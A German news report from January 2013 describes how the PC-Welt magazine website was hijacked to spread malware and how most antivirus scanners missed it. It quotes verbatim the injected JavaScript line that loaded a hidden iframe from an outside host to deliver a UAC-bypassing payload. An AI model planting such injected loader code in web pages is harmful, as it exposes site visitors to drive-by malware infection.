31. Januar 2013 - Cyber-Attacken

Homepage einer PC-Zeitschrift für Angriffe missbraucht

Vor Kurzem wurde die Website des Computer-Magazins PC-Welt zeitweise von Cyberkriminellen zur Verbreitung von Malware missbraucht. Dabei schlug ein Großteil der gebräuchlichen signatur-basierten Virenscanner nicht an.

homepage-einer-pc-zeitschrift-fur-angriffe-missbraucht.jpeg
Google Chrome warnte vor der Website der PC-Welt (Bildquelle: Screenshot Google Chrome).

Bekannt wurde der Angriff bei den für die Website pcwelt.de verantwortlichen Technikern durch Warnhinweise, die über die Malware-Erkennung der Browser Chrome und Firefox eingeblendet wurden.

Manipuliertes Javascript

Ursache für den Warnhinweis war eine manipulierte Javascript-Datei. Den Angreifern sei es laut PC-Welt gelungen, eine Javascript-Datei (require.js), die auf jeder pcwelt.de-Seite mit ausgeliefert wird, durch eine bislang unbekannte Sicherheitslücke um zusätzlichen, bösartigen Javascript-Code zu erweitern:

document.write(‚<iframe src=“http://aod.org.hk/help/index2.php“ width=1% height=1%></iframe>‘);

Diese Zeile habe zur Folge gehabt, dass  bei jedem Seitenaufruf ein iFrame mit aufgerufen wurde, über den eine Schad-Software  ausgeliefert wurde. Diese habe unter anderem versucht, die UAC (Benutzerkontensteuerung) von Windows auszuhebeln.

Viele Virenscanner versagten

Wie die PC-Welt berichtet, habe man das Problem identifizieren und die Malware auch beseitigen können. Da jedoch laut Heise Security  bis Montagnachmittag lediglich 7 von 45 Antiviren-Engines den verbreiteten Schadcode erkannten, sollten Anwender, die pcwelt.de im betroffenen Zeitraum besuchten, ihren PC einem Scan mit einem aktualisierten Virenscanner unterziehen.

(31.01.2013/fgo)

Sie glauben, Sie hätten noch so viel Zeit? Falsch! Es gibt mehr zu tun, als Sie vielleicht denken! ▶ Zeit zu handeln